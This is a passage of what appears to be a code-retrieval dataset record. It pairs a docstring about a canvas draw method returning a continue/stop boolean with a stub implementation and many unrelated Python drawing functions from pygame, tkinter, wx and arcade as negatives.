assert len(df[df['POPULATION'] > 500000]) == 5", "def test_9():\n table = pandas.read_csv('data/salary_in_various_regions.csv')\n query_result = show.show(table,\n metric='Salary(in $)' ,\n dimensions=['Resident City'] ,\n summary_operator=SummaryOperators.MEAN)\n print(query_result)\n expected_result = \"\"\" Resident City MEAN of Salary(in $)\n0 Chicago 1.658889e+05\n1 Palo Alto 3.033333e+04\n2 Washington 2.002740e+07\"\"\"\n\n expected_suggestions = \"[{'suggestion': 'Median is very different from the Mean', 'oversight': <Oversights.MEAN_VS_MEDIAN: 7>, 'is_row_level_suggestion': True, 'confidence_score': 3.1249999406334665, 'row_list': [{'row': 3, 'confidence_score': 3.1249999406334665}]}]\"\n\n assert(expected_result == query_result[0].to_string())\n assert(expected_suggestions == str(query_result[1]))" ]
[ "0.61581814", "0.60022753", "0.5817165", "0.5571238", "0.55539113", "0.54944795", "0.54687375", "0.5454587", "0.5425017", "0.5419371", "0.54093176", "0.54064757", "0.53786546", "0.5376907", "0.5369085", "0.53491753", "0.53406453", "0.53396004", "0.5316651", "0.5315632", "0.52647036", "0.5259786", "0.5213534", "0.52020866", "0.51928633", "0.51899886", "0.51895154", "0.5176623", "0.51749593", "0.5168549", "0.5158796", "0.51396424", "0.5137492", "0.5136301", "0.51309454", "0.5129353", "0.5127319", "0.5122721", "0.51169574", "0.5115569", "0.5107774", "0.5107061", "0.51064706", "0.510643", "0.51036155", "0.510052", "0.5097326", "0.5094514", "0.5092967", "0.50840443", "0.5082867", "0.50729406", "0.50727165", "0.5070588", "0.50705343", "0.50693166", "0.5068756", "0.50678766", "0.50672334", "0.5064154", "0.5062533", "0.5058465", "0.50539833", "0.50520813", "0.5050949", "0.50496435", "0.504924", "0.50478274", "0.5046457", "0.5038529", "0.50346947", "0.5034295", "0.5033025", "0.503236", "0.502734", "0.50260574", "0.50253874", "0.50234437", "0.5018503", "0.5013623", "0.50099844", "0.50080144", "0.5007222", "0.500457", "0.5004405", "0.50029165", "0.5002194", "0.5001717", "0.49986285", "0.499802", "0.499691", "0.4991123", "0.49905", "0.49873823", "0.498649", "0.49855527", "0.49846378", "0.4981249", "0.49797556", "0.49788144", "0.49731535" ]
0.0
-1
Implement your canvas drawing logic here; returning False will stop the rendering, and returning True will continue it
def draw(self, canvas) -> bool: return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def draw (self, screen):\n drew = bool(self.draw_fn(self, screen, self.dirty))\n self.dirty = False\n return drew", "def on_draw(self, widget, cr):\n #print \"starting to draw\"\n if self.double_buffer is not None:\n self.draw_tiles()\n cr.set_source_surface(self.double_buffer, 0.0, 0.0)\n cr.paint()\n else:\n print('Invalid double buffer')\n #print \"done drawing\"\n return False", "def draw_animation(self, canvas, animation_tick) -> bool:\n return False", "def on_draw_event(self, widget, ctx):\n # the _need_redraw flag doesnt work. it sometimes prevents\n # the rendering and leaving the canvas blank\n #if self._need_redraw:\n self._renderer.set_context(ctx)\n allocation = self.get_allocation()\n x, y, w, h = allocation.x, allocation.y, allocation.width, allocation.height\n self._render_figure(w, h)\n #self._need_redraw = False\n\n return False # finish event propagation?", "def draw():", "def paintGL(self):\n print \"Entereing paintGL\"\n if self.bDrawing == True:\n print \"Drawing was true so quit\"\n return\n \n \n self.bDrawing = True\n threadDrawGL = threading.Thread(target = self.drawGLScene)\n threadDrawGL.start()\n #self.drawGLScene()", "def _prepare_draw(self, view=None):\n return True", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n pass", "def draw(self):\n\n for row in self._board:\n for slot in row:\n if slot == 0:\n return False\n print \"It's a draw!\"\n return True", "def draw(self):\n\t\tpass", "def can_draw(self,point):\n if point <= 0:\n return False\n else:\n return True", "def draw(self):", "def draw (self):\n screen = self.screen\n dirty = False\n for display in self.displays:\n dirty |= display.draw(screen)\n return dirty", "def _draw(self, canvas, options):\n pass # must override in subclass", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self):\n raise NotImplementedError", "def draw(self):\n return self._myCanvas.draw()", "def game_draw(self):\n pass", "def conditionsAreMetForDrawing(self):\n\t\tcurrentController = self.controller.view().window().windowController()\n\t\tif currentController:\n\t\t\ttool = currentController.toolDrawDelegate()\n\t\t\ttextToolIsActive = tool.isKindOfClass_( NSClassFromString(\"GlyphsToolText\") )\n\t\t\thandToolIsActive = tool.isKindOfClass_( NSClassFromString(\"GlyphsToolHand\") )\n\t\t\tif not textToolIsActive and not handToolIsActive: \n\t\t\t\treturn True\n\t\treturn False", "def draw(self):\r\n if not self.stopped:\r\n super().draw()\r\n self.next_frame()", "def draw(self, screen):", "def save_drawing_if_necessary(self):\n\n app_doc_data = AppDocData.instance()\n if app_doc_data.activeDrawing and app_doc_data.activeDrawing.modified:\n #if QMessageBox.Yes == QMessageBox.question(self, self.tr(\"Question\"),\n # self.tr(\"Do you want to save drawing?\"),\n # QMessageBox.Yes | QMessageBox.No):\n # self.actionSaveCliked()\n # return True\n if QMessageBox.Ignore == QMessageBox.question(self, self.tr('Continue?'),\n self.tr('Changes may not have been saved.'),\n QMessageBox.Ignore | QMessageBox.Cancel):\n return False\n return True", "def isOnCanvas(self, x, y):\n return 0 <= x < self.width and 0 <= y < self.height", "def draw (self):\n screen = self.screen\n dirty = False\n for z, displays in self.layers.iteritems():\n for display in displays:\n drew = display.draw(screen)\n # if made changes to the surface\n if drew:\n # set any displays that overlap this one dirty\n for d in display.overlapped:\n d.dirty = True\n dirty |= 
drew\n return dirty", "def on_draw(self):\n # draw everything", "def draw(self, surface):\n checked_color = (0, 196, 0) if self.checked else pg.Color(\"white\")\n surface.fill(pg.Color(\"black\"), self.rect)\n surface.fill(self.color, self.rect.inflate(-2,-2))\n surface.fill(pg.Color(\"white\"), self.rect.inflate(-6,-6))\n surface.fill((205,205,205), self.rect.inflate(-8,-8))\n surface.fill(checked_color, self.select_rect)", "def draw(self) -> Any:", "def _logic(self):\n yes = self.yes_button.was_pressed or self.yes_button.pressed\n no = self.no_button.was_pressed or self.no_button.pressed\n\n # render\n if self.render_timer.finished:\n # start = time()\n self.window_renderer.update(self.buffer_image.tobytes())\n # debug(\"render time: %s\", time() - start)\n self.render_timer.start()\n\n if self.state == STATE_DEFAULT:\n if (no and not self.disable_quit) or (no and yes):\n self._enter_state(STATE_EXIT_PROMPT)\n elif yes:\n self._enter_state(STATE_PREPARE)\n\n elif self.state == STATE_EXIT_PROMPT:\n if yes:\n return False\n elif no:\n self._enter_state(STATE_DEFAULT)\n\n elif self.state == STATE_PREPARE:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken = list()\n self.camera_controller.clear_workdir()\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PICTURE_COUNTDOWN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n self.pictures_taken.append(self.camera_controller.capture_photo())\n self._enter_state(STATE_PICTURE_TAKEN)\n else:\n self.window.find_by_name(NAME_GET_STARTED).text = \"\" \\\n + str(len(self.pictures_taken) + 1) + \" of \" + str(self.picture_count) \\\n + \"\\n\" + str(int(self.countdown_timer.remaining) + 1)\n\n elif self.state == STATE_PICTURE_TAKEN:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif self.countdown_timer.finished:\n if len(self.pictures_taken) >= self.picture_count:\n t = threading.Thread(target=self._upload_to_twitter)\n t.start()\n self._enter_state(STATE_PRINT)\n else:\n self._enter_state(STATE_PICTURE_COUNTDOWN)\n\n elif self.state == STATE_PRINT:\n if no:\n self._enter_state(STATE_DEFAULT)\n elif yes:\n self._enter_state(STATE_PRINTING)\n\n elif self.state == STATE_PRINTING:\n if no:\n self._enter_state(STATE_DEFAULT)\n else:\n strip_file = self.create_strip()\n args = self.print_command.replace('{filename}', strip_file).split()\n subprocess.Popen(args)\n self._enter_state(STATE_COMPLETED)\n\n elif self.state == STATE_COMPLETED:\n if yes or no or self.countdown_timer.finished:\n self._enter_state(STATE_DEFAULT)\n\n else:\n raise RuntimeError(\"The app is in an unknown state: \" + str(self.state))\n\n return True", "def drawCells(self):\r\n self.drawing = not self.drawing\r\n if self.drawing:\r\n self.draw_button['text'] = \"No Draw\"\r\n else:\r\n self.draw_button['text'] = \"Draw\"", "def draw_mode(self):\n self.can_draw = True\n timer_thread = threading.Thread(target=self.timer) # starting a timer\n timer_thread.daemon = True\n timer_thread.start()\n headline = Label(self.root2, text=self.username) # the name of the user on top of the screen.\n headline.pack()\n # change color button.\n red_button = Button(self.root2, command=lambda: self.change_color('red'), bg='red')\n red_button.place(x=450, y=20)\n\n word_label = Label(self.root2, text=\"you need to draw: \" + self.word)\n word_label.pack()\n\n score_headline = Label(self.root2, text='score: ' + str(self.score), font=('bubble', 15), # the score\n bg='white', fg=\"black\", 
relief=\"solid\") # the title of the screen.\n score_headline.place(x=10, y=50)\n\n # if left button on the mouse is being clicked, it goes to the function 'send_coordinates '.\n # self.cv.bind('<B1-Motion>', self.send_coordinates)\n self.cv.pack(expand=YES, fill=BOTH)\n server_handler = threading.Thread(target=self.paint, daemon=True)\n # creating a thread that handles with the data the server sends to the client, w function 'paint'.\n server_handler.start()\n self.root2.mainloop()", "def OnPaint(self, event):\r\n\r\n dc = wx.AutoBufferedPaintDC(self)\r\n if self._currentImage.IsOk() and self._valid:\r\n dc.DrawBitmap(self._currentImage, 0, 0, True)\r\n else:\r\n self.Draw(dc)", "def update(self):\n check_key_press = lambda key: self._window.was_key_pressed(key)\n frame = self._current_image.copy()\n\n for key, event in self._key_events.items():\n if check_key_press(key):\n event()\n\n for annotation in self._annotations:\n annotation.draw(frame)\n\n if self._annotation_in_progress is not None:\n self._annotation_in_progress.draw(frame)\n\n self.show_controls(frame)\n\n self._window.draw(frame)\n return not self._window.should_quit", "def pre_draw(self):", "def begin_draw(self):\n pygame.init()\n self.display = pygame.display.set_mode(self.disp_size)\n pygame.display.set_caption('Map Editing')\n font = pygame.font.SysFont(\"arial\", 15)\n strings = [\"Press ESC to Start Drawing Obstacles\",\n \"Click Left to Draw & Right to Erase\",\n \"To finish Drawing,press Escape \",\n \"During search, Escape or Close to Quit\",\n \"you can also draw during the search, but it won't ba saved\"]\n texts = [font.render(s, True, (255, 255, 255)) for s in strings]\n for i, text in enumerate(texts):\n self.display.blit(text, (self.disp_size[0]//20, i*20+self.disp_size[1]//20))\n pygame.display.update()\n main_screen = True\n while main_screen:\n print(\"Waiting for start\")\n event = pygame.event.wait()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n main_screen = False\n self.display.fill([255, 255, 255])\n grid.draw(self.display)\n pygame.display.update()\n print(\"Now painting\")\n while True:\n event = pygame.event.wait()\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n break\n pos = list((np.array(pygame.mouse.get_pos())/self.block_size).astype(int))\n if pygame.mouse.get_pressed() == (1, 0, 0):\n print(\"Add wall at\", pos)\n grid[pos].type = \"WALL\"\n grid[pos].draw(self.display, self.block_size)\n elif pygame.mouse.get_pressed() == (0, 0, 1):\n print(\"remove wall from\", pos)\n grid[pos].type = \"ROAD\"\n grid[pos].draw(self.display, self.block_size)\n pygame.display.update()", "def draw(self):\n # IMPLEMENT ME\n \"\"\"\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\n if self.getState() == STATE_INACTIVE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED:\n self.getText().draw(self.view)\n if not self.getWave() is None:\n self.getWave().draw(self.view)\n if self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n if self.getState() == STATE_PAUSED or self.getState() == STATE_ACTIVE or self.getState() == STATE_COMPLETE:\n self.getText().draw(self.view)\n\n GRectangle(x=GAME_WIDTH/2,y=GAME_HEIGHT/2,\n width=GAME_WIDTH,height=GAME_HEIGHT,\n fillcolor=introcs.RGB(0,0,0)).draw(self.view)\"\"\"\n if not self.getText() is None:\n self.getText().draw(self.view)\n if not 
self.getWave() is None:\n self.getWave().draw(self.view)", "def draw(self):\n if (libt.map_is_in_fov(self.handler.fov_map, self.x, self.y) or \n self.handler.world.map[self.x][self.y].seen and self.visible_in_fog):\n libt.console_set_default_foreground(self.handler.game_map, self.colour)\n libt.console_put_char(self.handler.game_map, self.x, self.y, \n self.char, libt.BKGND_NONE)", "def _render(self, gc, points):\n with gc:\n gc.set_antialias(True)\n self._draw_default_axes(gc)\n self._draw_default_grid(gc)\n if len(points)>0:\n gc.clip_to_rect(self.x, self.y, self.width, self.height)\n gc.set_stroke_color(self.color_)\n gc.set_line_width(self.line_width)\n gc.set_line_dash(self.line_style_)\n\n gc.begin_path()\n gc.lines(points)\n gc.stroke_path()\n\n return", "def draw(self):\n if self.visible:\n glColor3f(self.r, self.g, self.b)\n graphicsBall(self.x, self.y, self.radius)\n\n if self.number <= 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n graphicsBall(self.x, self.y, self.radius / 2)\n\n if self.number > 0:\n if self.number > 8:\n glColor3f(1.0, 1.0, 1.0)\n else:\n glColor3f(0.0, 0.0, 0.0)\n\n if self.number < 10:\n graphicsText(self.x - 2, self.y - 3.5, str(self.number))\n else:\n graphicsText(self.x - 4.5, self.y - 3.5, str(self.number))", "def draw(self):\n self.write_image()\n self.update()", "def draw(self):\n self.figure.canvas.draw_idle()", "def draw( self, **kw ):\n pass", "def draw(self):\n if context.click():\n self.place()", "def draw(self):\n if self.is_clicked:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 0)\n else:\n pg.draw.circle(self.window, self.color, (self.x, self.y), self.r, 1)", "def _onPaint(self, evt):\n if not self._isRealized:\n self.realize()\n if self._drawn < 2:\n self.draw(repaint = False)\n self._drawn += 1\n self.gui_repaint(drawDC=wx.PaintDC(self))", "def EndDraw(self):\r\n\r\n pass", "def test_draw(self):\n image_name = filename(sys._getframe().f_code.co_name)\n result_file, reference_file = get_path(image_name)\n\n ''' This function is to create an empty image with a specific dimension\n with white background, and black/white colored '''\n\n image, canvas = get_image('L', (15,90),'white')\n\n for i in range(len(draw_points) - 1):\n draw(canvas, (draw_points[i + 0], draw_points[i + 1]), 'A')\n\n \"\"\" saving the file and closing it \"\"\"\n\n image.save(result_file)\n image.close()\n\n \"\"\" validate the resultant file against the reference images\"\"\"\n\n validate(reference_file, result_file)", "def paint(self):\r\n pass", "def draw(self):\n self.batch.draw()", "def checkDraw(self) -> D:\n if self.board.positions.count(\" \") == 0:\n print(\"DRAW!\")\n return True", "def draw(self, surface, force=False):\n if self.redraw or force:\n surface.blit(self.image, self.loc)\n self.redraw = False", "def on_draw(self):\n # Clearing the buffers\n self.clear()\n self.set3d()\n # Makes it so color can be added\n glColor3d(1, 1, 1)\n\n self.push(self.player.pos, self.player.rot)\n self.model.draw()\n glPopMatrix()\n self.model.process_queue_slowly()\n\n # Draws the crosshairs on the screen\n self.set2d()\n self.draw_position_label()\n self.draw_reticle()", "def on_draw(self, screen):\n raise NotImplemented(\"on_draw method should be implemented.\")", "def draw(self):\n #for (x, y) in self.coords:\n # pyxel.rect(\n # (x + self.x) * 4,\n # (y + self.y) * 4,\n # (x + self.x) * 4 + 3,\n # (y + self.y) * 4 + 3,\n # self.color)", "def should_redraw_board(self):\n return True", "def draw(self):\n if self.dirty or 
(self.image is None):\n self._render()\n self.screen.blit(self.image, self.rect)", "def _draw(self):\r\n \r\n if self.active:\r\n self.surface = self.activeSurface # Set active surface to be displayed.\r\n else:\r\n self.surface = self.passiveSurface # Set passive surface to be displayed.\r", "def draw(self):\n with self:\n self.batch.draw()", "def draw(self):\n if self.node:\n if self.async:\n if self.cancel_draw:\n self.after_cancel(self.cancel_draw)\n self.cancel_draw = self.after(3, self._draw)\n else: self._draw()", "def _drawOnCanvas(self):\n self.canvas=np.ones(self.canvas.shape,dtype=np.uint8)*255\n for key in self.elements:\n graphElement=self.elements[key]\n graphElement.draw(self.canvas)\n self.sync=True", "def draw(self, *args, **kwargs):\n self.window.clear()\n self.batch.draw()", "def draw(self, force = False):\n\t\tpass", "def draw(self):\r\n self.canvas.delete(tk.ALL)\r\n\r\n # Draw the points.\r\n radius = 2\r\n for point in self.points:\r\n x0 = point[0] - radius\r\n y0 = point[1] - radius\r\n x1 = x0 + 2 * radius\r\n y1 = y0 + 2 * radius\r\n self.canvas.create_oval(x0, y0, x1, y1, fill=\"red\", outline=\"red\")\r\n\r\n # If we have a solution, draw it.\r\n if self.solved:\r\n curve = []\r\n for x in range(self.canvas.winfo_width()):\r\n curve.append((x, F(self.a_values, x)))\r\n self.canvas.create_line(curve, fill=\"blue\")", "def draw(self, surface):\r\n if self.visible:\r\n surface.blit(self.image, (self.x, self.y))", "def requires_rendering(self, skip_bool_switch=False):\n if self.sorting_active: \n # This is to ensure the last frame when the thread is complete is still rendered\n if (not skip_bool_switch):\n self.sorting_active = self.thread.is_alive()\n return True\n else:\n return False", "def on_draw(self):\n\t\tself.render()", "def on_draw(self):\n\t\tself.render()", "def draw(self):\n self.screen.fill(WHITE)\n self.color_invalid()\n self.draw_selected()\n self.shade_locked_cells()\n self.draw_grid()\n self.draw_buttons()\n self.draw_numbers()", "def expose_cb(self, darea, event):\n cr = darea.window.cairo_create()\n cr.rectangle(event.area.x, event.area.y,\n event.area.width, event.area.height)\n cr.clip()\n cr.set_source_surface(self.surface, 0, 0)\n cr.paint()\n\n return False", "def __draw(self, display, color, size):\n\t\tif self.walls[0]: # up\n\t\t\tpygame.draw.line(display, color, (self.col * size , self.row * size) , (self.col * size + size, self.row * size))\n\t\tif self.walls[3]: # down\n\t\t\tpygame.draw.line(display, color, (self.col * size + size, self.row * size + size), (self.col * size , self.row * size + size))\n\t\tif self.walls[1]: #left\n\t\t\tpygame.draw.line(display, color, (self.col * size + size, self.row * size) , (self.col * size + size, self.row * size + size))\n\t\tif self.walls[2]: #right\n\t\t\tpygame.draw.line(display, color, (self.col * size , self.row * size + size), (self.col * size , self.row * size))\n\n\t\tif self.current:\n\t\t\tdraw_rect_with_alpha(display, self.CURRENT_COLOR, Vector((self.col, self.row)) * size, (size, size))\n\n\t\telif self.backtracked and self.SHOW_BACKTRACK:\n\t\t\tdraw_rect_with_alpha(display, self.BACKTRACKED_COLOR, Vector((self.col, self.row)) * size, (size, size))\n\n\t\telif self.visited:\n\t\t\tdraw_rect_with_alpha(display, self.VISITED_COLOR, Vector((self.col, self.row)) * size, (size, size))", "def repaint(self):\n self.screen.blit(self.source, (0, 0))\n self.lcd.draw(self.lcddraw)\n if self.drawmode & self.DRAW_CIRCLE:\n self.plot_circle()\n pygame.display.flip()", "def drawBoard(self):\r\n 
self.outer.draw(self.surface)\r\n self.background.draw(self.surface)\r\n for point in self.points:\r\n point.draw(self.surface)\r\n point.drawCheckers(self.surface)\r\n self.dice.draw(self.surface)\r\n self.message.draw(self.surface)\r\n self.checkerBox.draw(self.surface)\r\n self.checkerBox.drawCheckers(self.surface)\r\n for bar in self.bar:\r\n bar.draw(self.surface)\r\n bar.drawCheckers(self.surface)\r\n pygame.display.flip()", "def draw(self):\r\n scalex,scaley = self.getScale()\r\n try:\r\n self.clear()\r\n # Draw Graph Background\r\n self.drawLayout()\r\n if self.app.data == None:# If no data, break\r\n return\r\n # How much each pixel represents\r\n if scalex[1]-scalex[0] == 0:\r\n return\r\n step = (scalex[1]-scalex[0])/self.w# Draw lines at pixel level resolution\r\n self.fitYScale()\r\n sens_index = [0]# If one sensor displayed in this data player\r\n if len(self.sensor_ids) == 2:# If two sensors displayed in this data player\r\n sens_index = [1,0]# Draw order blue then red to make blue line on top\r\n for s in sens_index:\r\n i = scalex[0]\r\n x = 0\r\n trackcol = self.app.getSensorCol(self.sensors[self.sensor_ids[s]])\r\n while i < scalex[1]:\r\n i += step# i Is data\r\n x += 1# x is iteration/pixel-coordinate\r\n if i<0:# Skip data for t<0\r\n continue\r\n try:\r\n # Data retrieved from xml\r\n y = float(self.app.data[int(i)][self.sensor_ids[s]].text)\r\n y2 = float(self.app.data[int(i+step)][self.sensor_ids[s]].text)\r\n # Normalize into range 0 to 1 and multiply by height\r\n y = ((y-scaley[0])/(scaley[1]-scaley[0])) * self.h\r\n y2 = ((y2-scaley[0])/(scaley[1]-scaley[0])) * self.h\r\n except IndexError:# Missing data is skipped\r\n continue\r\n self.c.create_line(x,-y+self.h,x+1,-y2+self.h,fill=trackcol,width=1)\r\n self.drawScrubber()\r\n self.drawPeekScrubber()\r\n self.c.update()\r\n except tk.TclError:# If canvas destroyed, cancel draw operation\r\n return", "def _changed_canvas(self):\n return self.canvas is not self.ax.figure.canvas", "def do_paint(self):\r\n curses.curs_set(0)\r\n if self.win:\r\n self.paint()\r\n self.done_paint()", "def draw(self, screen):\n\n if self.exist:\n screen.blit(self._img, self._rect)", "def draw(self):\n self._background.draw(self.view)\n if self._state == STATE_INACTIVE:\n self._message.draw(self.view)\n if self._state == STATE_COUNTDOWN:\n self._game.draw(self.view)\n self._countdownMessage.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_ACTIVE:\n self._game.draw(self.view)\n self._soundImage.draw(self.view)\n if self._state == STATE_PAUSED:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)\n if self._state == STATE_RESET:\n self._message.draw(self.view)\n if self._state == STATE_COMPLETE:\n self._game.draw(self.view)\n self._pausedMessage.draw(self.view)", "def draw(self):\r\n try:\r\n self.sprite.draw()\r\n except:\r\n return -1", "def checkCanvasBoundsAndWrap(self):\n #check along the x axis\n if (self.xPos<0):\n self.setXPos(self.canvasIGetDrawnOnsWidth)\n \n elif (self.xPos>self.canvasIGetDrawnOnsWidth):\n self.setXPos(0)\n #check along the y axis\n if (self.yPos<0):\n self.setYPos(self.canvasIGetDrawnOnsHeight)\n \n elif (self.yPos>self.canvasIGetDrawnOnsHeight):\n self.setYPos(0)", "def draw(self):\n\n self.squares.draw(self.screen)\n if not self.hide_grid:\n self.draw_grid()\n self.fleas.draw(self.screen)\n pygame.display.flip()", "def draw(self):\n i = 0\n self.window.fill((60,50,20))\n for i in range(len(self.board)):\n for j in range(len(self.board[i])):\n 
pygame.draw.rect(self.window, ((i+j)%2*255, (i+j)%2*255, (i+j)%2*255), (20+j*100, 20+i*100, 100, 100))\n if self.board[i][j] != 0:\n if self.board[i][j].player == 0:\n color = (200, 0, 0)\n else:\n color = (0, 0, 200)\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, color, (30+j*100, 40+i*100, 80, 60))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, color, (40+j*100, 30+i*100, 60, 80))\n if self.board[i][j].master:\n if self.board[i][j].direction == 0:\n pygame.draw.ellipse(self.window, (255,255,0), (40+j*100, 50+i*100, 60, 40))\n pygame.draw.ellipse(self.window, color, (45+j*100, 55+i*100, 50, 30))\n elif self.board[i][j].direction == 1:\n pygame.draw.ellipse(self.window, (255,255,0), (50+j*100, 40+i*100, 40, 60))\n pygame.draw.ellipse(self.window, color, (55+j*100, 45+i*100, 30, 50))\n \n if self.selected != None:\n pygame.draw.rect(self.window, (200, 200, 0), (20+self.selected[1]*100, 20+self.selected[0]*100, 100, 100), 5)\n pygame.display.flip()", "def redraw(self):\n raise NotImplementedError()", "def draw(self):\n if self.state == 'alive':\n for i in range(len(self.tail)):\n pygame.draw.rect(display, black, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, black, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))\n\n else:\n for i in range(len(self.tail)):\n pygame.draw.rect(display, red, (squareToXPix(self.tail[-(i + 1)][0], objectSize), squareToYPix(self.tail[-(i + 1)][1], objectSize), objectSize, objectSize))\n\n pygame.draw.rect(display, red, (squareToXPix(self.x, objectSize), squareToYPix(self.y, objectSize), objectSize, objectSize))", "def draw2DOutlineEnabled(self):\n\n opts = self.opts\n overlay = self.overlay\n\n return ((overlay.trimesh is not None) and\n (opts.outline or opts.vertexData is not None))", "def draw(self):\n\n super().draw()\n\n if self.hit or self.miss:\n # Change colour depending on hit or miss\n fl_color(FL_RED if self.hit else FL_WHITE)\n fl_pie(self.x()+4, self.y()+4, self.w() - 8, self.h() - 8, 0.0, 360.0)", "def draw_game():\n # Fill window with background color\n RENDER_WINDOW.fill(BACKGROUNDCOLOR)\n\n # Draw Game Title\n draw_title()\n\n # Draw Puzzle\n draw_puzzle()\n \n # Draw buttons to GUI \n draw_buttons()\n\n # Draw Text\n draw_text() \n\n # Draw random toggle\n draw_rand_toggle()", "def draw():\n background(255)\n for i in range(COLS):\n for j in range(ROWS):\n if (BOARD[i][j] == 1): fill(0)\n else: fill(255)\n noStroke() # stroke(0)\n rect(i * CELL_SIZE, j * CELL_SIZE, CELL_SIZE, CELL_SIZE)\n if (PLAY):\n generate()", "def on_draw_over_image(self):", "def setDrawingMode(self):\n pass", "def tick(self):\n # detect pressed keys\n if not self.handle_events():\n return False\n # redraw\n if self.pause:\n return True\n self.phy.tick()\n color = 0\n self.screen.fill((0, 0, 0))\n new_image = pygame.Surface(self.screen.get_size()).convert()\n for p in self.phy.objects:\n self.put_object(new_image, p, COLORS[color])\n color = (color + 1) % len(COLORS)\n self.screen.blit(new_image, (0, 0))\n color = 0\n for p in self.phy.objects:\n text = \"%.2E\" % (int(p.mass))\n self.put_text(\n text,\n COLORS[color], (\n int(p.position[0] / SCALE_FACTOR) - len(text) * 5,\n int(p.position[1] / SCALE_FACTOR + int(p.radius) / SCALE_FACTOR * 1.2)\n )\n )\n color = (color + 1) % len(COLORS)\n self.show_status()\n pygame.display.set_icon(self.surficon)\n 
pygame.display.flip()\n return True", "def on_draw(self):\n\n # Clear the screen and start drawing\n arcade.start_render()\n\n # Draw the rectangles\n for shape in self.shapes:\n shape.draw()", "def draw(self) -> None:\n concenter = False\n if self.ui.checkConcenter.isChecked():\n concenter = True\n data_concenter = self.check_concenter()\n if data_concenter is None:\n message.show_error(config.USER_ERR3)\n return None\n\n if self.ui.tabWidget.currentIndex() == 0: # means circle\n data_circle = self.check_circle()\n if data_circle is None: # if data aren't correct\n message.show_error(config.USER_ERR1)\n return None\n\n current_algorithm = self.ui.comboBox.currentText() # Get name of method\n if concenter: # if checkbox of concenter is checked\n step, count = data_concenter\n for i in range(count):\n function.draw_circle(self, data_circle, current_algorithm)\n data_circle[2] += step\n else:\n function.draw_circle(self, data_circle, current_algorithm)\n\n elif self.ui.tabWidget.currentIndex() == 1: # means ellipse\n data_ellipse = self.check_ellipse()\n if data_ellipse is None:\n message.show_error(config.USER_ERR2)\n return None\n\n current_algorithm = self.ui.comboBox.currentText() # Get name of method\n if concenter: # if checkbox of concenter is checked\n step, count = data_concenter\n\n # We must know bigger side of ellipse to prevent its deformation\n a_bigger = data_ellipse[2] > data_ellipse[3]\n\n for i in range(count):\n function.draw_ellipse(self, data_ellipse, current_algorithm)\n # Bigger side must expands on step\n # Smaller only on part of it\n if a_bigger:\n data_ellipse[2] += step\n data_ellipse[3] += data_ellipse[3] / data_ellipse[2] * step\n else:\n data_ellipse[3] += step\n data_ellipse[2] += data_ellipse[2] / data_ellipse[3] * step\n else:\n function.draw_ellipse(self, data_ellipse, current_algorithm)\n\n else:\n message.show_error(config.PROG_ERR2)\n return None", "def draw(self, draw_surface):\n\n # The menu frame and how many surf (frame that appears in the middle\n # of the bottom of the screen).\n draw_surface.blit(self.menu_frame, (176, 112))\n draw_surface.blit(self.how_many_surf, (40, 115))\n\n if self.confirm_toss_response_dialogue is None and \\\n self.threw_away_dialogue is None:\n self.quantity_cursor.draw(draw_surface)\n\n # If on the trow away dialogue we don't need to draw anything else (it\n # is taken care of in the how many surf). 
Return so that cursor and\n # yes no surf are not drawn.\n if self.threw_away_dialogue is not None:\n return\n\n elif self.confirm_toss_response_dialogue is not None:\n draw_surface.blit(self.yes_no_surf, (195, 127))\n self.cursor.draw(draw_surface)", "def draw(self):\n\n for item in self.vis:\n item.undraw()\n self.render()\n for item in self.vis:\n item.draw(self.win)\n self.drawn = True", "def _redraw(self, render_as_done: \"bool\" = False) -> \"None\":\n if not self.drawn:\n cast(\"Application\", super())._redraw(render_as_done=True)\n self.drawn = True", "def draw(self, canvas):\n super().draw(canvas, self.__path)", "def draw(self):\n if not self.pressed:\n #draw dialogue prompt\n arcade.draw_rectangle_filled(self.center_x, self.center_y, 20, 20, arcade.color.ALABAMA_CRIMSON)\n arcade.draw_text(\"!\", self.center_x, self.center_y, arcade.color.BLACK, anchor_x=\"center\", anchor_y=\"center\")\n else:\n #draw dialogue box\n arcade.draw_rectangle_filled(self.center_x, self.center_y, self.width, self.height, self.color)\n arcade.draw_text(self.text, self.center_x, self.center_y, arcade.color.BLACK, anchor_x=\"center\", anchor_y=\"center\")" ]
